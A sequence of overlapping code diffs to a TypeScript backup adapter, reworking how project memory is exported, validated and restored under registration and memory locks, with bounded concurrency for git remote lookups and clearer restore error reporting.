+            // From now on this project is the local identity of the recorded source: later
+            // restores match it and can update its memory instead of re-offering an
+            // add-only import that can never change an existing file.
+            await writeProjectMemoryOrigin(muxRoot, targetDir, entry.path);
+            return result;
+          });
           return { writtenFiles: written, skippedFiles: skipped };
         },
       };

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -18,7 +18,10 @@ import {
   memoryMutationLockKey,
   withTargetMutationLock,
 } from "@/node/services/refinement/targetMutationLocks";
-import { withProjectRegistrationLock } from "@/node/config/projectRegistrationLock";
+import {
+  type ProjectRegistrationLockHandle,
+  withProjectRegistrationLock,
+} from "@/node/config/projectRegistrationLock";
 import { execFileAsync } from "@/node/utils/disposableExec";
 import {
   BackupServiceError,
@@ -635,7 +638,9 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       const payload = await readBackupPayload(sourceDir);
       const before = await localFilesByPath();
 
-      const restoreCore = async (): Promise<{ localOnlyFiles: string[] }> => {
+      const restoreCore = async (
+        registration: ProjectRegistrationLockHandle | null
+      ): Promise<{ localOnlyFiles: string[] }> => {
         const result = await restoreBackupPayload({
           muxRoot,
           payload,
@@ -643,15 +648,20 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
         });
         if (result.backupPreferences !== undefined) {
           let merged: ReturnType<typeof normalizeUserPreferences> | undefined;
-          await options.config.editConfig((current) => {
-            // Merged against the config this edit reads, not a snapshot taken before the
-            // restore: a whole-object write would otherwise discard preferences another
-            // window saved meanwhile, including the machine-local keys no backup carries.
-            merged = normalizeUserPreferences(
-              mergeBackupPreferences(current.userPreferences, result.backupPreferences)
-            );
-            return { ...current, userPreferences: merged };
-          });
+          await options.config.editConfig(
+            (current) => {
+              // Merged against the config this edit reads, not a snapshot taken before the
+              // restore: a whole-object write would otherwise discard preferences another
+              // window saved meanwhile, including the machine-local keys no backup carries.
+              merged = normalizeUserPreferences(
+                mergeBackupPreferences(current.userPreferences, result.backupPreferences)
+              );
+              return { ...current, userPreferences: merged };
+            },
+            // Inside the project restore's registration window the edit must ride that
+            // window's hold: taking its own would wait on itself.
+            registration === null ? {} : { withinRegistrationLock: registration }
+          );
           // saveConfig logs and swallows write failures, so a resolved edit does not prove
           // the preferences landed. Compared through the backup projection because every
           // key a restore can change is portable, so a lost write is visible there, while
@@ -682,7 +692,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
         // core-only restore, but its presence is reported so the skip is visible.
         projectBundleSkipped =
           !restoreOptions.includeProjects && (await projectBundleExists(sourceDir));
-        core = await restoreCore();
+        core = await restoreCore(null);
       } else {
         // Only entries the caller validated as matched, to the very same destination. A
         // project registered at its recorded path since validation was previewed as an
@@ -755,7 +765,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
             // Before each irreversible step: this process must still hold the registration
             // lock, or the registration read above may no longer describe the project set.
             await registration.assertStillOwned();
-            const coreResult = await restoreCore();
+            const coreResult = await restoreCore(registration);
             // Matched entries restore verbatim, exactly what the preview promised. Imports
             // are executed separately by the service, after project registration.
             for (const match of matched) {

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -819,7 +819,12 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
             });
             // From now on this project is the local identity of the recorded source: later
             // restores match it and can update its memory instead of re-offering an
-            // add-only import that can never change an existing file.
+            // add-only import that can never change an existing file. Only once every file
+            // landed, though: a matched restore overwrites, so recording the origin over
+            // skipped conflicts would let the next restore replace exactly the local files
+            // this import promised to leave alone. Until the conflicts are resolved, the
+            // source stays an import candidate.
+            if (result.skipped.length > 0) return result;
             try {
               await writeProjectMemoryOrigin(muxRoot, targetDir, entry.path);
             } catch (error) {

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -5,9 +5,11 @@ import type { Config } from "@/node/config";
 import type { BackupFileChange, BackupProjectImport } from "@/common/orpc/schemas/backup";
 import { normalizeUserPreferences } from "@/common/config/schemas/userPreferences";
 import {
+  MAX_BACKUP_PROJECT_ENTRIES,
   sanitizeBackupGitRemote,
   type BackupProjectBundleEntry,
 } from "@/common/config/schemas/settingsBackup";
+import { AsyncSemaphore } from "@/node/utils/concurrency/asyncSemaphore";
 import { MULTI_PROJECT_CONFIG_KEY } from "@/common/constants/multiProject";
 import { SCRATCH_PROJECT_CONFIG_KEY } from "@/common/constants/scratch";
 import type { ProjectConfig } from "@/common/types/project";
@@ -28,6 +30,8 @@ import { BACKUP_GIT_TIMEOUT_MS } from "@/constants/terminationTimeouts";
 import { BackupRepoCache } from "./gitRepo";
 import {
   PROJECT_BUNDLE_DIR,
+  ProjectMemoryRestoreError,
+  ProjectMemoryWriteError,
   backupPayloadExists,
   bundleEntryFiles,
   collectProjectBundle,
@@ -188,6 +192,9 @@ function describeMissingBackup(managedPath: string): string {
     : `No Xum backup found in '${managedPath}' or legacy ${fallbacks} on this branch`;
 }
 
+/** Concurrent `git remote get-url` probes during bundle export. */
+const REMOTE_DISCOVERY_CONCURRENCY = 8;
+
 /** Best-effort: a missing origin, a non-git directory, or a hung git must never fail an export. */
 async function readProjectGitRemote(projectPath: string): Promise<string | undefined> {
   try {
@@ -270,19 +277,35 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
    * also what restore-side matching recomputes.
    */
   async function listProjectBundleEntries(): Promise<BackupProjectBundleEntry[]> {
-    const entries: BackupProjectBundleEntry[] = [];
-    for (const [projectPath, projectConfig] of userProjects()) {
-      const gitRemote = await readProjectGitRemote(projectPath);
-      entries.push({
-        path: projectPath,
-        // Clamped to the manifest schema's cap so a long custom title cannot produce a
-        // bundle this build's own restore would refuse.
-        name: getProjectDisplayName(projectPath, projectConfig).slice(0, 256),
-        ...(gitRemote !== undefined ? { gitRemote } : {}),
-        memoryDir: projectMemoryDirName(projectPath),
-      });
+    const projects = userProjects();
+    // Before any lookup: an over-limit config would otherwise run every remote probe
+    // only to be refused by the bundle collector afterwards.
+    if (projects.length > MAX_BACKUP_PROJECT_ENTRIES) {
+      throw new Error(`Backup has more than ${MAX_BACKUP_PROJECT_ENTRIES} projects`);
     }
-    return entries;
+    // Each probe has its own timeout, so sequential discovery over many projects on slow
+    // filesystems could stall a preview or push for minutes; bounded parallelism keeps the
+    // worst case proportional to the limit, not the project count.
+    const probes = new AsyncSemaphore(REMOTE_DISCOVERY_CONCURRENCY);
+    return await Promise.all(
+      projects.map(async ([projectPath, projectConfig]) => {
+        const slot = await probes.acquire();
+        let gitRemote: string | undefined;
+        try {
+          gitRemote = await readProjectGitRemote(projectPath);
+        } finally {
+          slot.release();
+        }
+        return {
+          path: projectPath,
+          // Clamped to the manifest schema's cap so a long custom title cannot produce a
+          // bundle this build's own restore would refuse.
+          name: getProjectDisplayName(projectPath, projectConfig).slice(0, 256),
+          ...(gitRemote !== undefined ? { gitRemote } : {}),
+          memoryDir: projectMemoryDirName(projectPath),
+        };
+      })
+    );
   }
 
   function registeredProjectDirs(): Map<string, string> {
@@ -292,19 +315,15 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
   }
 
   function toProjectImports(plan: ProjectBundleRestorePlan): BackupProjectImport[] {
-    return plan.imports.map(({ entry, files, token }) => {
-      // Re-sanitized on read, not just on export: the manifest is repository-controlled,
-      // so a crafted remote must pass the same filter before it reaches the UI.
-      const gitRemote =
-        entry.gitRemote === undefined ? undefined : sanitizeBackupGitRemote(entry.gitRemote);
-      return {
-        sourcePath: entry.path,
-        name: entry.name,
-        ...(gitRemote !== undefined ? { gitRemote } : {}),
-        memoryFileCount: files.length,
-        token,
-      };
-    });
+    // Remotes were already sanitized when the manifest was parsed, so a crafted checkout
+    // cannot reach the UI through this field.
+    return plan.imports.map(({ entry, files, token }) => ({
+      sourcePath: entry.path,
+      name: entry.name,
+      ...(entry.gitRemote !== undefined ? { gitRemote: entry.gitRemote } : {}),
+      memoryFileCount: files.length,
+      token,
+    }));
   }
 
   async function readBundleWithPlan(
@@ -320,9 +339,13 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
     plan: ProjectBundleRestorePlan
   ): Promise<BackupFileChange[]> {
     if (plan.matched.length === 0) return [];
-    const localBundle = await collectProjectBundle(
-      muxRoot,
-      plan.matched.map((match) => match.entry)
+    // Under the memory lock like every other backup read of project memory, so a
+    // concurrent memory edit cannot yield a torn diff or a failed identity check.
+    const localBundle = await withMemoryLock(() =>
+      collectProjectBundle(
+        muxRoot,
+        plan.matched.map((match) => match.entry)
+      )
     );
     const localByPath = new Map(localBundle.files.map((file) => [file.path, file]));
     const changes: BackupFileChange[] = [];
@@ -352,12 +375,17 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       // fresh after the core payload.
       let scanFiles = payload.files;
       if (exportOptions.includeProjects) {
-        const bundle = await collectProjectBundle(
-          muxRoot,
-          await listProjectBundleEntries(),
-          // Restore refuses files past the memory subsystem's read limit, so exporting
-          // them would only produce a backup no build can bring back.
-          { skipOversizedMemoryFiles: true }
+        const entries = await listProjectBundleEntries();
+        // Collected under the memory lock so an agent writing memory mid-export cannot
+        // produce a torn bundle or trip the collector's identity checks.
+        const bundle = await withMemoryLock(() =>
+          collectProjectBundle(
+            muxRoot,
+            entries,
+            // Restore refuses files past the memory subsystem's read limit, so exporting
+            // them would only produce a backup no build can bring back.
+            { skipOversizedMemoryFiles: true }
+          )
         );
         await writeProjectBundle(path.join(destination, PROJECT_BUNDLE_DIR), bundle, {
           ownerOnly: true,
@@ -591,11 +619,30 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
             // Matched entries restore verbatim, exactly what the preview promised. Imports
             // are executed separately by the service, after project registration.
             for (const match of matched) {
-              const { written } = await writeProjectMemoryFiles(
-                muxRoot,
-                match.files.map((file) => ({ path: file.path, content: file.content })),
-                { addOnly: false }
-              );
+              let written: string[];
+              try {
+                written = (
+                  await writeProjectMemoryFiles(
+                    muxRoot,
+                    match.files.map((file) => ({ path: file.path, content: file.content })),
+                    { addOnly: false }
+                  )
+                ).written;
+              } catch (error) {
+                // Files written so far — earlier entries and this one's partial progress —
+                // are on disk; the failure must still announce them.
+                if (error instanceof ProjectMemoryWriteError && error.written.length > 0) {
+                  restoredProjectMemory.push({
+                    projectPath: match.entry.path,
+                    files: error.written,
+                  });
+                }
+                throw new ProjectMemoryRestoreError(
+                  error instanceof Error ? error.message : String(error),
+                  restoredProjectMemory,
+                  { cause: error }
+                );
+              }
               if (written.length > 0) {
                 changedFiles.push(...written);
                 restoredProjectMemory.push({ projectPath: match.entry.path, files: written });

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -670,7 +670,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
         // is taken first (the fixed order; `ProjectService.remove` takes only it) and holds
         // project unregistration off for the same window, so the registration read below
         // stays true until the matched memory has landed.
-        core = await withProjectRegistrationLock(muxRoot, () =>
+        core = await withProjectRegistrationLock(muxRoot, (registration) =>
           withMemoryLock(async () => {
             // The plan is recomputed at the write boundary, from registration and the origin
             // markers as they are now: origin markers are written under the memory lock (by
@@ -718,12 +718,16 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
                 { portable: false, ownerOnly: true }
               );
             }
+            // Before each irreversible step: this process must still hold the registration
+            // lock, or the registration read above may no longer describe the project set.
+            await registration.assertStillOwned();
             const coreResult = await restoreCore();
             // Matched entries restore verbatim, exactly what the preview promised. Imports
             // are executed separately by the service, after project registration.
             for (const match of matched) {
               let written: string[];
               try {
+                await registration.assertStillOwned();
                 written = (
                   await writeProjectMemoryFiles(muxRoot, matchedProjectWrites(match), {
                     addOnly: false,

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -10,16 +10,15 @@ import {
   type BackupProjectBundleEntry,
 } from "@/common/config/schemas/settingsBackup";
 import { AsyncSemaphore } from "@/node/utils/concurrency/asyncSemaphore";
-import { MULTI_PROJECT_CONFIG_KEY } from "@/common/constants/multiProject";
-import { SCRATCH_PROJECT_CONFIG_KEY } from "@/common/constants/scratch";
+import { isSystemProjectEntry } from "@/common/utils/systemProjects";
 import type { ProjectConfig } from "@/common/types/project";
 import { getProjectDisplayName } from "@/common/utils/subProjects";
 import { projectMemoryDirName } from "@/node/services/memoryService";
 import {
   memoryMutationLockKey,
-  withProjectRegistrationLock,
   withTargetMutationLock,
 } from "@/node/services/refinement/targetMutationLocks";
+import { withProjectRegistrationLock } from "@/node/config/projectRegistrationLock";
 import { execFileAsync } from "@/node/utils/disposableExec";
 import {
   BackupServiceError,
@@ -271,14 +270,6 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       muxRoot,
       memoryMutationLockKey(muxRoot, path.join(muxRoot, "memory")),
       operation
-    );
-  }
-
-  function isSystemProjectEntry(projectPath: string, projectConfig: ProjectConfig): boolean {
-    return (
-      projectPath === MULTI_PROJECT_CONFIG_KEY ||
-      projectPath === SCRATCH_PROJECT_CONFIG_KEY ||
-      projectConfig.projectKind === "system"
     );
   }
 

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -384,7 +384,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
             entries,
             // Restore refuses files past the memory subsystem's read limit, so exporting
             // them would only produce a backup no build can bring back.
-            { skipOversizedMemoryFiles: true }
+            { portableMemoryOnly: true }
           )
         );
         await writeProjectBundle(path.join(destination, PROJECT_BUNDLE_DIR), bundle, {
@@ -659,8 +659,8 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       };
     },
 
-    async importProjectMemory(importOptions) {
-      const sourceDir = await managedDir(importOptions.repositoryRoot, importOptions.managedPath);
+    async prepareProjectImports(prepareOptions) {
+      const sourceDir = await managedDir(prepareOptions.repositoryRoot, prepareOptions.managedPath);
       const bundle = await readProjectBundle(sourceDir);
       if (bundle === null) {
         throw new BackupServiceError(
@@ -668,27 +668,34 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
           "The backup no longer carries a project bundle"
         );
       }
-      // Token lookup rather than trusting any caller-named entry: the token binds the
-      // approval to the exact entry and content, and the repo lock has held the checkout
-      // stable since the service validated it, so a miss here is defensive only.
-      const entry = bundle.manifest.projects.find(
-        (candidate) => projectImportToken(candidate, bundle.files) === importOptions.token
+      // Tokens computed once for the parsed bundle: the repo lock has held the checkout
+      // stable since the service validated it, so per-import rehashing would only repeat
+      // this work.
+      const entriesByToken = new Map(
+        bundle.manifest.projects.map((entry) => [projectImportToken(entry, bundle.files), entry])
       );
-      if (entry === undefined) {
-        throw new BackupServiceError(
-          "INVALID_BACKUP",
-          "The approved project import no longer matches the backup"
-        );
-      }
-      const targetDir = projectMemoryDirName(importOptions.targetPath);
-      const writes = bundleEntryFiles(bundle.files, entry).map((file) => ({
-        path: rekeyProjectMemoryPath(file.path, targetDir),
-        content: file.content,
-      }));
-      const { written, skipped } = await withMemoryLock(() =>
-        writeProjectMemoryFiles(muxRoot, writes, { addOnly: true })
-      );
-      return { writtenFiles: written, skippedFiles: skipped };
+      return {
+        async importProjectMemory(importOptions) {
+          // Token lookup rather than trusting any caller-named entry: the token binds the
+          // approval to the exact entry and content, so a miss here is defensive only.
+          const entry = entriesByToken.get(importOptions.token);
+          if (entry === undefined) {
+            throw new BackupServiceError(
+              "INVALID_BACKUP",
+              "The approved project import no longer matches the backup"
+            );
+          }
+          const targetDir = projectMemoryDirName(importOptions.targetPath);
+          const writes = bundleEntryFiles(bundle.files, entry).map((file) => ({
+            path: rekeyProjectMemoryPath(file.path, targetDir),
+            content: file.content,
+          }));
+          const { written, skipped } = await withMemoryLock(() =>
+            writeProjectMemoryFiles(muxRoot, writes, { addOnly: true })
+          );
+          return { writtenFiles: written, skippedFiles: skipped };
+        },
+      };
     },
   };
 }

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -549,12 +549,12 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       // before the caller takes a safety snapshot it would have no use for.
       await planRestoreWrites(muxRoot, payload);
       if (!validateOptions.includeProjects) {
-        return { hasProjectBundle: false, projectImports: [], matchedProjectPaths: [] };
+        return { hasProjectBundle: false, projectImports: [], matchedProjects: [] };
       }
       // A bundle the restore would refuse is refused here too, for the same reason.
       const bundlePlan = await readBundleWithPlan(sourceDir);
       if (bundlePlan === null) {
-        return { hasProjectBundle: false, projectImports: [], matchedProjectPaths: [] };
+        return { hasProjectBundle: false, projectImports: [], matchedProjects: [] };
       }
       // The matched writes' own refusals (memory size and count limits, non-file
       // destinations) belong to the preflight too: found only inside the restore, they
@@ -573,11 +573,15 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       return {
         hasProjectBundle: true,
         projectImports: toProjectImports(bundlePlan.plan),
-        // The classification the caller validated against. Restore re-partitions the
-        // bundle, but only writes matched entries that were also matched here, so a
-        // project registered mid-restore cannot be overwritten outside the plan the
-        // snapshot covered.
-        matchedProjectPaths: bundlePlan.plan.matched.map((match) => match.entry.path),
+        // The classification the caller validated against, destination included. Restore
+        // re-partitions the bundle but only writes entries that resolve to the very same
+        // local project here, so neither a project registered mid-restore nor a fallback
+        // to a different origin can be written outside the plan the snapshot covered.
+        matchedProjects: bundlePlan.plan.matched.map((match) => ({
+          sourcePath: match.entry.path,
+          projectPath: match.projectPath,
+          localMemoryDir: match.localMemoryDir,
+        })),
       };
     },
 
@@ -650,7 +654,11 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
           // recorded path since validation was previewed as an import and is not covered
           // by the snapshot, so it must not be overwritten here; one unregistered since
           // validation drops out of the recomputed plan on its own.
-          const validatedMatched = new Set(restoreOptions.matchedProjectPaths);
+          const validatedMatched = new Set(
+            restoreOptions.matchedProjects.map(
+              (match) => `${match.sourcePath}\0${match.projectPath}\0${match.localMemoryDir}`
+            )
+          );
           // One lock window for the snapshot and the overwrite: a memory edit landing
           // between them would otherwise be destroyed with a snapshot that predates it.
           await withMemoryLock(async () => {
@@ -662,8 +670,9 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
             const registered = registeredProjectDirs();
             const matched = bundlePlan.plan.matched.filter(
               (match) =>
-                validatedMatched.has(match.entry.path) &&
-                registered.get(match.projectPath) === match.localMemoryDir
+                validatedMatched.has(
+                  `${match.entry.path}\0${match.projectPath}\0${match.localMemoryDir}`
+                ) && registered.get(match.projectPath) === match.localMemoryDir
             );
             if (matched.length > 0) {
               // Exactly the files these writes can overwrite: not whole project directories,

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -34,8 +34,10 @@ import {
   ProjectMemoryRestoreError,
   ProjectMemoryWriteError,
   assertManagedTreeWithinLimits,
+  assertProjectMemoryWritesAllowed,
   backupPayloadExists,
   bundleEntryFiles,
+  collectOverwritableProjectMemory,
   serializeProjectBundleManifest,
   collectProjectBundle,
   planProjectBundleRestore,
@@ -531,6 +533,12 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       if (bundlePlan === null) {
         return { hasProjectBundle: false, projectImports: [], matchedProjectPaths: [] };
       }
+      // The matched writes' own refusals (memory size and count limits, non-file
+      // destinations) belong to the preflight too: found only inside the restore, they
+      // would surface after the core settings were already overwritten.
+      for (const match of bundlePlan.plan.matched) {
+        await assertProjectMemoryWritesAllowed(muxRoot, match.files);
+      }
       return {
         hasProjectBundle: true,
         projectImports: toProjectImports(bundlePlan.plan),
@@ -612,19 +620,25 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
           // by the snapshot, so it must not be overwritten here; one unregistered since
           // validation drops out of the recomputed plan on its own.
           const validatedMatched = new Set(restoreOptions.matchedProjectPaths);
-          const matched = bundlePlan.plan.matched.filter((match) =>
-            validatedMatched.has(match.entry.path)
-          );
           // One lock window for the snapshot and the overwrite: a memory edit landing
           // between them would otherwise be destroyed with a snapshot that predates it.
           await withMemoryLock(async () => {
+            // Registration is re-read at the write boundary so a project unregistered since
+            // the plan was computed is left alone. Project registration is not serialized
+            // with memory writes (config edits take no memory lock), so this is the
+            // narrowest check available, not a guarantee against a concurrent edit landing
+            // between this read and the write.
+            const registered = registeredProjectDirs();
+            const matched = bundlePlan.plan.matched.filter(
+              (match) =>
+                validatedMatched.has(match.entry.path) &&
+                registered.get(match.entry.path) === match.entry.memoryDir
+            );
             if (matched.length > 0) {
-              // Exactly the memory these writes can overwrite — unrelated registered
-              // projects neither need covering nor may count against the bundle limits.
-              const localBundle = await collectProjectBundle(
-                muxRoot,
-                matched.map((match) => match.entry)
-              );
+              // Exactly the files these writes can overwrite: not whole project directories,
+              // whose unrelated local-only notes neither need covering nor may fail the
+              // restore, and never other registered projects.
+              const localBundle = await collectOverwritableProjectMemory(muxRoot, matched);
               await writeProjectBundle(
                 path.join(restoreOptions.snapshotPath, PROJECT_BUNDLE_DIR),
                 localBundle,

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -430,7 +430,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
         // and none can change between the listing and the bundle that publishes it. Memory
         // is collected under the memory lock so an agent writing memory mid-export cannot
         // produce a torn bundle or trip the collector's identity checks.
-        const bundle = await withProjectRegistrationLock(muxRoot, async () => {
+        const bundle = await withProjectRegistrationLock(muxRoot, async (registration) => {
           const entries = listProjectBundleEntries(remotes);
           const collected = await withMemoryLock(() =>
             collectProjectBundle(
@@ -441,6 +441,9 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
               { portableMemoryOnly: true }
             )
           );
+          // Before the irreversible write: a hold lost while collecting (this process frozen
+          // past the lease) would mean the list no longer describes the registered projects.
+          await registration.assertStillOwned();
           await writeProjectBundle(path.join(destination, PROJECT_BUNDLE_DIR), collected, {
             ownerOnly: true,
           });

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -269,17 +269,15 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
    * half the feature. `memoryDir` records this install's actual directory name, which is
    * also what restore-side matching recomputes.
    */
-  async function listProjectBundleEntries(entryOptions: {
-    withRemotes: boolean;
-  }): Promise<BackupProjectBundleEntry[]> {
+  async function listProjectBundleEntries(): Promise<BackupProjectBundleEntry[]> {
     const entries: BackupProjectBundleEntry[] = [];
     for (const [projectPath, projectConfig] of userProjects()) {
-      const gitRemote = entryOptions.withRemotes
-        ? await readProjectGitRemote(projectPath)
-        : undefined;
+      const gitRemote = await readProjectGitRemote(projectPath);
       entries.push({
         path: projectPath,
-        name: getProjectDisplayName(projectPath, projectConfig),
+        // Clamped to the manifest schema's cap so a long custom title cannot produce a
+        // bundle this build's own restore would refuse.
+        name: getProjectDisplayName(projectPath, projectConfig).slice(0, 256),
         ...(gitRemote !== undefined ? { gitRemote } : {}),
         memoryDir: projectMemoryDirName(projectPath),
       });
@@ -294,13 +292,19 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
   }
 
   function toProjectImports(plan: ProjectBundleRestorePlan): BackupProjectImport[] {
-    return plan.imports.map(({ entry, files, token }) => ({
-      sourcePath: entry.path,
-      name: entry.name,
-      ...(entry.gitRemote !== undefined ? { gitRemote: entry.gitRemote } : {}),
-      memoryFileCount: files.length,
-      token,
-    }));
+    return plan.imports.map(({ entry, files, token }) => {
+      // Re-sanitized on read, not just on export: the manifest is repository-controlled,
+      // so a crafted remote must pass the same filter before it reaches the UI.
+      const gitRemote =
+        entry.gitRemote === undefined ? undefined : sanitizeBackupGitRemote(entry.gitRemote);
+      return {
+        sourcePath: entry.path,
+        name: entry.name,
+        ...(gitRemote !== undefined ? { gitRemote } : {}),
+        memoryFileCount: files.length,
+        token,
+      };
+    });
   }
 
   async function readBundleWithPlan(
@@ -350,7 +354,10 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       if (exportOptions.includeProjects) {
         const bundle = await collectProjectBundle(
           muxRoot,
-          await listProjectBundleEntries({ withRemotes: true })
+          await listProjectBundleEntries(),
+          // Restore refuses files past the memory subsystem's read limit, so exporting
+          // them would only produce a backup no build can bring back.
+          { skipOversizedMemoryFiles: true }
         );
         await writeProjectBundle(path.join(destination, PROJECT_BUNDLE_DIR), bundle, {
           ownerOnly: true,
@@ -474,36 +481,34 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       // before the caller takes a safety snapshot it would have no use for.
       await planRestoreWrites(muxRoot, payload);
       if (!validateOptions.includeProjects) {
-        return { hasProjectBundle: false, projectImports: [] };
+        return { hasProjectBundle: false, projectImports: [], matchedProjectPaths: [] };
       }
       // A bundle the restore would refuse is refused here too, for the same reason.
       const bundlePlan = await readBundleWithPlan(sourceDir);
       if (bundlePlan === null) {
-        return { hasProjectBundle: false, projectImports: [] };
+        return { hasProjectBundle: false, projectImports: [], matchedProjectPaths: [] };
       }
-      return { hasProjectBundle: true, projectImports: toProjectImports(bundlePlan.plan) };
+      return {
+        hasProjectBundle: true,
+        projectImports: toProjectImports(bundlePlan.plan),
+        // The classification the caller validated against. Restore re-partitions the
+        // bundle, but only writes matched entries that were also matched here, so a
+        // project registered mid-restore cannot be overwritten outside the plan the
+        // snapshot covered.
+        matchedProjectPaths: bundlePlan.plan.matched.map((match) => match.entry.path),
+      };
     },
 
-    async writeSafetySnapshot(snapshotRoot, snapshotOptions) {
+    async writeSafetySnapshot(snapshotRoot) {
       // Unredacted: this copy never leaves the machine, and a redacted snapshot could
       // not restore a credential whose MCP server the restore removed.
+      // Project memory is intentionally absent here: restore snapshots exactly the
+      // matched entries it will overwrite, inside the same memory-lock window as the
+      // write, so nothing can edit a file between its snapshot bytes and its overwrite.
       await writeBackupPayload(snapshotRoot, await buildPayload({ keepLocalSecrets: true }), {
         portable: false,
         ownerOnly: true,
       });
-      if (snapshotOptions.includeProjectMemory) {
-        // Registered projects only: an import that lands at a previously unregistered
-        // target writes add-only and reports every created file, so the snapshot's job is
-        // covering the memory a matched restore can overwrite.
-        const bundle = await collectProjectBundle(
-          muxRoot,
-          await listProjectBundleEntries({ withRemotes: false })
-        );
-        await writeProjectBundle(path.join(snapshotRoot, PROJECT_BUNDLE_DIR), bundle, {
-          portable: false,
-          ownerOnly: true,
-        });
-      }
     },
 
     async restore(restoreOptions) {
@@ -551,6 +556,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
         .map(([file]) => file);
 
       let projectBundleSkipped = false;
+      const restoredProjectMemory: Array<{ projectPath: string; files: string[] }> = [];
       if (!restoreOptions.includeProjects) {
         // Existence-only, like the preview: a malformed sidecar must never block a
         // core-only restore, but its presence is reported so the skip is visible.
@@ -558,21 +564,51 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       } else {
         const bundlePlan = await readBundleWithPlan(sourceDir);
         if (bundlePlan !== null) {
-          // Matched entries restore verbatim, exactly what the preview promised. Imports
-          // are executed separately by the service, after project registration.
-          const writes = bundlePlan.plan.matched.flatMap((match) =>
-            match.files.map((file) => ({ path: file.path, content: file.content }))
+          // Only entries the caller validated as matched. A project registered at its
+          // recorded path since validation was previewed as an import and is not covered
+          // by the snapshot, so it must not be overwritten here; one unregistered since
+          // validation drops out of the recomputed plan on its own.
+          const validatedMatched = new Set(restoreOptions.matchedProjectPaths);
+          const matched = bundlePlan.plan.matched.filter((match) =>
+            validatedMatched.has(match.entry.path)
           );
-          const { written } = await withMemoryLock(() =>
-            writeProjectMemoryFiles(muxRoot, writes, { addOnly: false })
-          );
-          changedFiles.push(...written);
+          // One lock window for the snapshot and the overwrite: a memory edit landing
+          // between them would otherwise be destroyed with a snapshot that predates it.
+          await withMemoryLock(async () => {
+            if (matched.length > 0) {
+              // Exactly the memory these writes can overwrite — unrelated registered
+              // projects neither need covering nor may count against the bundle limits.
+              const localBundle = await collectProjectBundle(
+                muxRoot,
+                matched.map((match) => match.entry)
+              );
+              await writeProjectBundle(
+                path.join(restoreOptions.snapshotPath, PROJECT_BUNDLE_DIR),
+                localBundle,
+                { portable: false, ownerOnly: true }
+              );
+            }
+            // Matched entries restore verbatim, exactly what the preview promised. Imports
+            // are executed separately by the service, after project registration.
+            for (const match of matched) {
+              const { written } = await writeProjectMemoryFiles(
+                muxRoot,
+                match.files.map((file) => ({ path: file.path, content: file.content })),
+                { addOnly: false }
+              );
+              if (written.length > 0) {
+                changedFiles.push(...written);
+                restoredProjectMemory.push({ projectPath: match.entry.path, files: written });
+              }
+            }
+          });
         }
       }
       return {
         changedFiles: changedFiles.sort(),
         localOnlyFiles: result.localOnlyFiles,
         projectBundleSkipped,
+        restoredProjectMemory,
       };
     },
 

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -701,24 +701,29 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       const entriesByToken = new Map(
         bundle.manifest.projects.map((entry) => [projectImportToken(entry, bundle.files), entry])
       );
+      // Token lookup rather than trusting any caller-named entry: the token binds the
+      // approval to the exact entry and content, so a miss here is defensive only.
+      const rekeyedWrites = (importOptions: { token: string; targetPath: string }) => {
+        const entry = entriesByToken.get(importOptions.token);
+        if (entry === undefined) {
+          throw new BackupServiceError(
+            "INVALID_BACKUP",
+            "The approved project import no longer matches the backup"
+          );
+        }
+        const targetDir = projectMemoryDirName(importOptions.targetPath);
+        return bundleEntryFiles(bundle.files, entry).map((file) => ({
+          path: rekeyProjectMemoryPath(file.path, targetDir),
+          content: file.content,
+        }));
+      };
       return {
+        async assertProjectMemoryAllowed(importOptions) {
+          await assertProjectMemoryWritesAllowed(muxRoot, rekeyedWrites(importOptions));
+        },
         async importProjectMemory(importOptions) {
-          // Token lookup rather than trusting any caller-named entry: the token binds the
-          // approval to the exact entry and content, so a miss here is defensive only.
-          const entry = entriesByToken.get(importOptions.token);
-          if (entry === undefined) {
-            throw new BackupServiceError(
